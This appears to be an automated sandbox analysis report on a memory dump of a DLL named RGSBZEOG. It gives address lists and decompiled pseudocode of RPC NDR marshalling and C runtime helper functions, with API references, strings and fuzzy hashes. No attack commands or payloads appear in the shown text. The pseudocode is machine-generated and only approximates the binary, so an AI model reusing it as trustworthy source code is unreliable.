                                                                                              0x6f70ddb1
                                                                                              0x6f70ddb1
                                                                                              0x6f70dddc
                                                                                              0x6f70dde2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dad3
                                                                                              0x6f70dad7
                                                                                              0x6f70dada
                                                                                              0x6f70dae7
                                                                                              0x6f70daec
                                                                                              0x6f70dadc
                                                                                              0x6f70dadc
                                                                                              0x6f70dae1
                                                                                              0x6f70dae1
                                                                                              0x6f70daf0
                                                                                              0x6f70daf3
                                                                                              0x6f70daf9
                                                                                              0x6f70db05
                                                                                              0x6f70db0a
                                                                                              0x6f70db0d
                                                                                              0x6f70db10
                                                                                              0x6f70db14
                                                                                              0x6f70db17
                                                                                              0x6f70db19
                                                                                              0x6f70db1c
                                                                                              0x6f70db1f
                                                                                              0x6f70db22
                                                                                              0x6f70db25
                                                                                              0x6f70db27
                                                                                              0x6f70db2a
                                                                                              0x6f70db2d
                                                                                              0x6f70db2e
                                                                                              0x6f70db31
                                                                                              0x6f70db34
                                                                                              0x6f70db35
                                                                                              0x6f70db3a
                                                                                              0x6f70db3f
                                                                                              0x6f70db42
                                                                                              0x6f70db47
                                                                                              0x6f70db47
                                                                                              0x6f70db25
                                                                                              0x6f70db4d
                                                                                              0x6f70db50
                                                                                              0x6f70db54
                                                                                              0x6f70db56
                                                                                              0x6f70db59
                                                                                              0x6f70db5c
                                                                                              0x6f70db5d
                                                                                              0x6f70db62
                                                                                              0x6f70db67
                                                                                              0x6f70db6a
                                                                                              0x6f70db6f
                                                                                              0x6f70db6f
                                                                                              0x6f70db75
                                                                                              0x6f70db78
                                                                                              0x6f70db7c
                                                                                              0x6f70db89
                                                                                              0x6f70db8c
                                                                                              0x6f70db8f
                                                                                              0x6f70db93
                                                                                              0x6f70dba0
                                                                                              0x6f70dba3
                                                                                              0x6f70dba8
                                                                                              0x6f70dbb0
                                                                                              0x6f70dbb8
                                                                                              0x6f70dbbc
                                                                                              0x6f70dbbe
                                                                                              0x6f70dcac
                                                                                              0x6f70dcac
                                                                                              0x00000000
                                                                                              0x6f70dbc4
                                                                                              0x6f70dbc4
                                                                                              0x6f70dbc8
                                                                                              0x6f70dbca
                                                                                              0x6f70dbe1
                                                                                              0x6f70dbe5
                                                                                              0x6f70dbe7
                                                                                              0x6f70dc17
                                                                                              0x6f70dc17
                                                                                              0x6f70dc1a
                                                                                              0x6f70dc1d
                                                                                              0x6f70dc1f
                                                                                              0x6f70dc22
                                                                                              0x6f70dc23
                                                                                              0x6f70dc26
                                                                                              0x6f70dc27
                                                                                              0x6f70dc2d
                                                                                              0x6f70dc30
                                                                                              0x6f70dc30
                                                                                              0x6f70dc32
                                                                                              0x6f70dc32
                                                                                              0x6f70dc35
                                                                                              0x6f70dc38
                                                                                              0x6f70dc3a
                                                                                              0x6f70dc3d
                                                                                              0x6f70dc51
                                                                                              0x6f70dc55
                                                                                              0x6f70dc58
                                                                                              0x6f70dc5b
                                                                                              0x6f70dc5f
                                                                                              0x6f70dc3f
                                                                                              0x6f70dc3f
                                                                                              0x6f70dc47
                                                                                              0x6f70dc4c
                                                                                              0x6f70dc67
                                                                                              0x6f70dc6a
                                                                                              0x6f70dc6d
                                                                                              0x6f70dc70
                                                                                              0x6f70dc90
                                                                                              0x6f70dc93
                                                                                              0x6f70dc95
                                                                                              0x6f70dc96
                                                                                              0x6f70dc9b
                                                                                              0x6f70dc9e
                                                                                              0x6f70dc9f
                                                                                              0x6f70dca4
                                                                                              0x6f70dca9
                                                                                              0x6f70dc72
                                                                                              0x6f70dc72
                                                                                              0x6f70dc75
                                                                                              0x6f70dc77
                                                                                              0x6f70dc78
                                                                                              0x6f70dc7d
                                                                                              0x6f70dc80
                                                                                              0x6f70dc81
                                                                                              0x6f70dc86
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: copying %p to %p$unknown array format 0x%x
                                                                                              • API String ID: 4104443479-2029649059
                                                                                              • Opcode ID: ff4a0c06aecee70f3f3517ce785335d542ab50072c5d61e8c2c6a6bc339f7ee7
                                                                                              • Instruction ID: 030d5e8189ccbcf8b2e8038d05273404ccb4315fa12295891aaee1f16c7357e8
                                                                                              • Opcode Fuzzy Hash: ff4a0c06aecee70f3f3517ce785335d542ab50072c5d61e8c2c6a6bc339f7ee7
                                                                                              • Instruction Fuzzy Hash: 81A15EF9A04249AFCB04DFA8D990DAE7BF6BF89304F148059F9149B341D735EA11CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E6F703AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed char* _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				char _v40;
                                                                                              				signed int _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _t116;
                                                                                              				char _t125;
                                                                                              				intOrPtr _t137;
                                                                                              				intOrPtr _t140;
                                                                                              				void* _t152;
                                                                                              				void* _t216;
                                                                                              				void* _t217;
                                                                                              				void* _t218;
                                                                                              				void* _t219;
                                                                                              				void* _t220;
                                                                                              				void* _t221;
                                                                                              
                                                                                              				_v12 = _a12[1] & 0x0000ffff;
                                                                                              				_v8 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v32 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v36 = 0;
                                                                                              				_v16 = 0;
                                                                                              				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t219 = _t218 + 0x14;
                                                                                              				_t116 = _a4;
                                                                                              				_t223 =  *((intOrPtr*)(_t116 + 0x34));
                                                                                              				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
                                                                                              					_v48 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F705F90(_t223, _a4, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
                                                                                              					_t219 = _t219 + 8;
                                                                                              					_v44 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v20;
                                                                                              				}
                                                                                              				E6F7073D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t220 = _t219 + 8;
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v24 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(_v8 != 0) {
                                                                                              					_t140 = E6F70D650( *_v8 & 0x000000ff, _a4, _v8);
                                                                                              					_t220 = _t220 + 0xc;
                                                                                              					_v16 = _t140;
                                                                                              					_v12 = _v12 + _v16;
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v36 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					_t137 = E6F70A3B0(_a4, _a4, _v12);
                                                                                              					_t220 = _t220 + 8;
                                                                                              					 *_a8 = _t137;
                                                                                              				}
                                                                                              				_t125 = E6F709560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
                                                                                              				_t221 = _t220 + 0x14;
                                                                                              				_v40 = _t125;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						E6F710730(_v40, 0, _v16);
                                                                                              						_t221 = _t221 + 0xc;
                                                                                              					}
                                                                                              					E6F70D830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
                                                                                              				}
                                                                                              				if(_v44 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}
                                                                                              APIs
                                                                                              • _NdrComplexStructMemorySize@8.RGSBZEOG(?,?), ref: 6F703B2C
                                                                                              • _memset.LIBCMT ref: 6F703CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ComplexMemorySize@8Struct_memset
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                              • API String ID: 4515687-1755659387
                                                                                              • Opcode ID: 717bf0c3680a446106666c7732d726c84d6ee8a94a07bae5879ede0874155b0f
                                                                                              • Instruction ID: 62f100c826b347f3a03f6376c4a59e6514e054f5d810d0c25c969659bf836167
                                                                                              • Opcode Fuzzy Hash: 717bf0c3680a446106666c7732d726c84d6ee8a94a07bae5879ede0874155b0f
                                                                                              • Instruction Fuzzy Hash: 979104B4A00249AFDB44CF58C990BEEBBF5BF88304F148159F8599B381D775EA51CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F708794
                                                                                              Strings
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F708713
                                                                                              • invalid format type %x, xrefs: 6F708732
                                                                                              • flags: 0x%02x, xrefs: 6F70875A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 408728c1b847ce2931d29850ea94b4cda2c2a695167b5edfc416e997a64a53fc
                                                                                              • Instruction ID: 485805f106630c86625dc32dc1b84c934bee220733b47bc22c7cc9a565de5277
                                                                                              • Opcode Fuzzy Hash: 408728c1b847ce2931d29850ea94b4cda2c2a695167b5edfc416e997a64a53fc
                                                                                              • Instruction Fuzzy Hash: 9911E6F12082945BD704DF65DD60FAA7BE5FF8A310F0491A9FCA48B289D535E520C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 44%
                                                                                              			E6F703D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed char* _v20;
                                                                                              				intOrPtr _t81;
                                                                                              				void* _t125;
                                                                                              				void* _t126;
                                                                                              				void* _t127;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t126 = _t125 + 0x14;
                                                                                              				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                              					E6F7073D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					_t127 = _t126 + 8;
                                                                                              					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                              						_v20 = _a12;
                                                                                              						_v12 =  *((intOrPtr*)(_v20 + 2));
                                                                                              						_a12 = _v20 + 6;
                                                                                              					} else {
                                                                                              						_v12 = _v8[2] & 0x0000ffff;
                                                                                              						_a12 =  &(_v8[4]);
                                                                                              					}
                                                                                              					if((_a16 & 0x000000ff) == 0) {
                                                                                              						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              							 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t81 = E6F70A3B0(_a4, _a4, _v12);
                                                                                              						_t127 = _t127 + 8;
                                                                                              						 *_a8 = _t81;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F70AF00(_a4, _v12);
                                                                                              					_a12 = E6F70C2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					0x6f700000("copying %p to %p\n", _v16,  *_a8);
                                                                                              					if( *_a8 != _v16) {
                                                                                              						E6F7100E0( *_a8, _v16, _v12);
                                                                                              					}
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                              • API String ID: 4104443479-4001265739
                                                                                              • Opcode ID: 6db85a129be4ed8789ca06792395ff35bf4d3715385b2ef75ac76817000af2e0
                                                                                              • Instruction ID: 1fb9ac14fc6969857bdb0767aa0168c8840d62378659fbb0f8c27ab3a8e4f3da
                                                                                              • Opcode Fuzzy Hash: 6db85a129be4ed8789ca06792395ff35bf4d3715385b2ef75ac76817000af2e0
                                                                                              • Instruction Fuzzy Hash: 77514EB5A04248AFCB44DF98D991DAEBBF5BF89304F148199F8199B345D730EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 28%
                                                                                              			E6F7041B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* _t71;
                                                                                              				void* _t99;
                                                                                              				void* _t100;
                                                                                              
                                                                                              				_v12 = 0;
                                                                                              				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				if(( *_a12 & 0x000000ff) == 0x21) {
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x18)) = 0;
                                                                                              					E6F706490(_a4, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
                                                                                              					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
                                                                                              					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              						_v12 = 1;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                              					E6F70D650(0x21, _a4, _a12);
                                                                                              					E6F70D830(_t71, _t99, _t100, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                              					if(_v12 != 0) {
                                                                                              						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              				0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              				 *0x6f700000(0x6e6);
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • _NdrComplexArrayMemorySize@8.RGSBZEOG(?,?), ref: 6F70424C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ArrayComplexMemorySize@8
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 2085160478-2050479018
                                                                                              • Opcode ID: 8ba760bc1cd11247618bcda75f68b3555424df93958307ae4756a2455b838d5c
                                                                                              • Instruction ID: 087083a3dde1cc1e811e8e97adc71b35905632adf6cc7c3d9241fc6110ffe7fb
                                                                                              • Opcode Fuzzy Hash: 8ba760bc1cd11247618bcda75f68b3555424df93958307ae4756a2455b838d5c
                                                                                              • Instruction Fuzzy Hash: 6F41F9B5A00209AFDB04DF94C994BAA7BF5BF88314F14C159FD488B385D771EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: 20a32340d27ef70aec29bdc31a5178a57be6684c38a4df3f8e54f3c00dda9d6d
                                                                                              • Instruction ID: 3e31d7eabaf74f3ba078f16b4f70ccbbcb7d197f93d3bb9fd88cc624a6b2a955
                                                                                              • Opcode Fuzzy Hash: 20a32340d27ef70aec29bdc31a5178a57be6684c38a4df3f8e54f3c00dda9d6d
                                                                                              • Instruction Fuzzy Hash: D3617EF5900209AFDB04DFA8DA81AAF77B5BF48318F04815DF9199B341E631EA10CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: b48d11ad09300df79ef16047d4a58543d4dbe009ccd15e3cf18fa5bbcf322b0e
                                                                                              • Instruction ID: 5d6d98bc21181fc678a9c50591cb7cac403f806b97c66bcf65608ecf222c71bf
                                                                                              • Opcode Fuzzy Hash: b48d11ad09300df79ef16047d4a58543d4dbe009ccd15e3cf18fa5bbcf322b0e
                                                                                              • Instruction Fuzzy Hash: CE6162F5A00209AFDB04DF68DA80AAF77F5BF48219F048559FD19AB341D631EA10CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F717336(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				char _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				int _v20;
                                                                                              				int _t35;
                                                                                              				int _t38;
                                                                                              				intOrPtr* _t44;
                                                                                              				int _t47;
                                                                                              				short* _t49;
                                                                                              				intOrPtr _t50;
                                                                                              				intOrPtr _t54;
                                                                                              				int _t55;
                                                                                              				int _t59;
                                                                                              				char* _t62;
                                                                                              
                                                                                              				_t62 = _a8;
                                                                                              				if(_t62 == 0) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t50 = _a12;
                                                                                              				if(_t50 == 0) {
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				if( *_t62 != 0) {
                                                                                              					E6F711DE3( &_v20, _a16);
                                                                                              					_t35 = _v20;
                                                                                              					__eflags =  *(_t35 + 0xa8);
                                                                                              					if( *(_t35 + 0xa8) != 0) {
                                                                                              						_t38 = E6F71717C( *_t62 & 0x000000ff,  &_v20);
                                                                                              						__eflags = _t38;
                                                                                              						if(_t38 == 0) {
                                                                                              							__eflags = _a4;
                                                                                              							_t59 = 1;
                                                                                              							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                              							if(__eflags != 0) {
                                                                                              								L21:
                                                                                              								__eflags = _v8;
                                                                                              								if(_v8 != 0) {
                                                                                              									_t54 = _v12;
                                                                                              									_t31 = _t54 + 0x70;
                                                                                              									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                              									__eflags =  *_t31;
                                                                                              								}
                                                                                              								return _t59;
                                                                                              							}
                                                                                              							L20:
                                                                                              							_t44 = E6F712A54(__eflags);
                                                                                              							_t59 = _t59 | 0xffffffff;
                                                                                              							__eflags = _t59;
                                                                                              							 *_t44 = 0x2a;
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t59 = _v20;
                                                                                              						__eflags =  *(_t59 + 0x74) - 1;
                                                                                              						if( *(_t59 + 0x74) <= 1) {
                                                                                              							L15:
                                                                                              							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                              							L16:
                                                                                              							if(__eflags < 0) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							__eflags = _t62[1];
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							L18:
                                                                                              							_t59 =  *(_t59 + 0x74);
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                              						if(__eflags < 0) {
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						__eflags = _a4;
                                                                                              						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                              						_t59 = _v20;
                                                                                              						__eflags = _t47;
                                                                                              						if(_t47 != 0) {
                                                                                              							goto L18;
                                                                                              						}
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					_t55 = _a4;
                                                                                              					__eflags = _t55;
                                                                                              					if(_t55 != 0) {
                                                                                              						 *_t55 =  *_t62 & 0x000000ff;
                                                                                              					}
                                                                                              					_t59 = 1;
                                                                                              					goto L21;
                                                                                              				}
                                                                                              				_t49 = _a4;
                                                                                              				if(_t49 != 0) {
                                                                                              					 *_t49 = 0;
                                                                                              				}
                                                                                              				goto L5;
                                                                                              			}

















                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F71736C
                                                                                              • __isleadbyte_l.LIBCMT ref: 6F71739A
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F7173C8
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F7173FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: afae0147ed3f12cbbdd8ed09f17fd0d18c69b18532f9b35602758714cfebcf13
                                                                                              • Instruction ID: 5cec14386f4354fdb3105f041c810a8aa66e97e014547efb8cc9508d1045954a
                                                                                              • Opcode Fuzzy Hash: afae0147ed3f12cbbdd8ed09f17fd0d18c69b18532f9b35602758714cfebcf13
                                                                                              • Instruction Fuzzy Hash: EC318231608246ABDB11CE75CA44BAA7FB5FF41310F194579E8649B1D0E730E86ADB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F711E8C(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				intOrPtr _t25;
                                                                                              				void* _t26;
                                                                                              
                                                                                              				_t25 = _a16;
                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                              					_t26 = E6F7123DD(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t34 = _t25 - 0x66;
                                                                                              					if(_t25 != 0x66) {
                                                                                              						__eflags = _t25 - 0x61;
                                                                                              						if(_t25 == 0x61) {
                                                                                              							L7:
                                                                                              							_t26 = E6F711F12(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              						} else {
                                                                                              							__eflags = _t25 - 0x41;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L7;
                                                                                              							} else {
